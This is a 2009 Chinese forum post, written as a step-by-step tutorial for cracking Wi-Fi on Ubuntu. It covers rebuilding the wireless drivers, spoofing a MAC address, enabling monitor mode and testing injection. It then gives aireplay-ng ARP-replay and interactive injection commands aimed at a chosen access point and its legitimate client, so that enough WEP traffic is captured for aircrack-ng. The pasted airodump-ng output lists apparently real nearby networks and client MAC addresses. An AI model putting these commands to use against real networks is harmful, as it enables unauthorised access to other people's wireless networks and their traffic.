中校
- 注册时间
- 2008-10-30
- 金币
- 4477 个
- 威望
- 75 个
- 荣誉
- 25 个
尚未签到
|
发表于 2009-4-25 22:06
破解安装和使用大致流程如下
sudo apt-get install libnl-dev libssl-dev libertas
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2009-04-16.tar.bz2
#注意 http://wireless.kernel.org/download/compat-wireless-2009-04-16.tar.bz2 一定要下载最新的包
#我这里只是演示而已
sudo cp compat-wireless-2009-04-16.tar.bz2 /usr/src #把包移到/usr/src
sudo tar xf compat-wireless-2009-04-16.tar.bz2 #解压
cd compat-wireless-2009-04-16.tar.bz2 #编译前记得开无线开关
sudo make #编译
sudo make install #编译安装
sudo rmmod iwlagn iwlcore #暂时卸载驱动
sudo make load #加载新的无线驱动,不行就重启一下
#如果出现下面的
Unloading mac80211...
FATAL: Module mac80211 is in use.
Unloading cfg80211...
FATAL: Module cfg80211 is in use.
make: *** [unload] Error 1
就是没暂时卸载驱动,执行sudo rmmod iwlagn iwlcore
#sudo make uninstall &&sudo reboot #卸载新的无线驱动并重启
使用
我就以4965卡为例子
#下面是改变mac地址
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
#下面开始使用
sudo ifconfig wlan0 up #启用wlan0接口
sudo airmon-ng start wlan0 #开mon0 注入接口
#出现monitor mode enabled on mon0就正常
sudo aireplay-ng -9 mon0 #测试是否能注入
#正常就出现Injection is working!
#不然就No Answer...
#可以用sudo iwconfig wlan0 channel 6 来转到第6频道,6就是频道,你可以换11或1
#改变后sudo aireplay-ng -9 mon0 再次测试
#开始破解,具体可以参考中卫的BT3 破解无线WEP和WPA增加版教程.pdf
我就用4965比较支持的aireplay-ng 参数 -0 -1 -2 -3 来说明一下
记得,ubuntu8.10后抓包和注入都用mon0(mon系列的接口)
-3 有客户端
airodump-ng -w test --ivs -c 6 mon0 #用mon0接口来抓取频道6的ivs(破解wep用的包) 名字是test
#出现的一堆东西.现在就是抓包破解了,最基本的,如果你有时间,你就可以等,等它的data足够到支持破解为止
#下面介绍下airodump-ng出现的数据
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
00:19:E0:94:07:30 163 0 9 0 0 6 54. WPA2 CCMP PSK h
#00:19:E0:94:07:30 就是AP的mac Data就是wep破解需要的包 data多到一定程度就可以用aircrack-ng破解
#ENC 对应的是加密方式,好像上面那行的话就是wpa2,是不能这个抓包的方式破解的要wep才可以
00:1D:0F:7C:19:5E 167 0 15 0 0 5 54. WPA2 CCMP PSK 2
00:21:27:81:66:E6 164 0 43 7 0 6 54. WEP WEP 1
00:21:27:61:38:86 166 0 9 4 1 4 54. WPA2 CCMP PSK 2
00:21:27:1B:B1:F8 163 0 16 3 0 6 54. WPA2 CCMP PSK ?
00:1D:0F:43:46:54 179 5 58 29 5 6 54. WEP WEP OPN S
00:21:27:73:04:C0 163 0 4 0 0 6 54. WEP WEP 6
00:1D:0F:36:43:0E 165 5 47 29 1 6 54. WEP WEP ±
00:21:27:64:25:42 164 2 52 0 0 6 54. WPA2 CCMP PSK D
BSSID STATION PWR Rate Lost Packets Probes
00:19:E0:94:07:30 00:1C:26:A3:23:B9 163 0- 1 20 2 huhuusb
#上面那行 00:19:E0:94:07:30 就是ap的mac 00:1C:26:A3:23:B9 就是它合法的客户端
00:21:27:1B:B1:F8 00:22:5F:16:91:CB 166 0- 2 165 3
00:1D:0F:43:46:54 00:13:E8:68:A5:CD 164 0- 1 3 12
00:1D:0F:43:46:54 00:13:E8:65:68:9F 165 0- 1 20 4 Sky
(not associated) 00:1D:E0:6D:CB:07 174 0- 1 0 1
(not associated) 00:13:E8:65:5A:9B 163 0- 1 0 1
#ok 下面来-3(有客户端)注入
sudo aireplay-ng -3 -b 00:19:E0:94:07:30 -h 00:1C:26:A3:23:B9 mon0
#成功的话 airodump-ng上的对应mac的data就会不断上升就可以用aircrack破解了
#-2
#sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <合法客户端 mac> wifi0
sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:19:E0:94:07:30 -h 00:1C:26:A3:23:B9 mon0
#按y就可以了
#其他的我就不演示,大家参考BT3 破解无线WEP和WPA增加版教程.pdf
接入无线wep
1
开无线
2
ifconfig wlan0 up #打开接口
iwlist scan #扫描无线网络
sudo iwconfig #查看无线设置
iwconfig wlan0 key password ap ap's_mac essid nick_name
#例子如下
sudo iwconfig wlan0 key 1234567890 essid Sky ap 00:1D:0F:43:46:54
#记得用完上面的那条命令iwconfig查看,essid, Access Point Encryption key 一定要有才能接入
#很多时候 出现 Access Point: Not-Associated ,你就要用sudo iwconfig wlan0 ap off/any 来尝试
#再不行就用ifconfig wlan0 up 再用iwconfig 重新设置
sudo dhclient wlan0 #利用dhcp 接入无线
接入wpa方法按的blog复制下来,你一般不需要用到
ubuntu不能用dhclinet wlan0 接入wpa加密的AP
我的方法就是利用模拟FAKE注入来接入AP
然后用dhclinet wlan0 来获得IP
First of all
you must know wpa's AP password ,essid,bssid
#essid is AP's MAC
wpa_passphrase TP-LINK password >acc_wpa
Then
vi acc_wpa
#add bssid after ssid
#example bssid=00:90:96:00:00:02
At last
sudo wpa_supplicant -c test -Dwired -i wlan0
sudo iwconfig wlan0 essid TP-LINK key 0123456789 ap 00:90:96:00:00:02
iwconfig
#if it return as follow
wlan0 IEEE 802.11abgn ESSID:"TP-LINK"
Mode:Managed Frequency:2.412 GHz Access Point: 00:90:96:00:00:02
#Then you can access wpa's AP
dhclient wlan0 |
|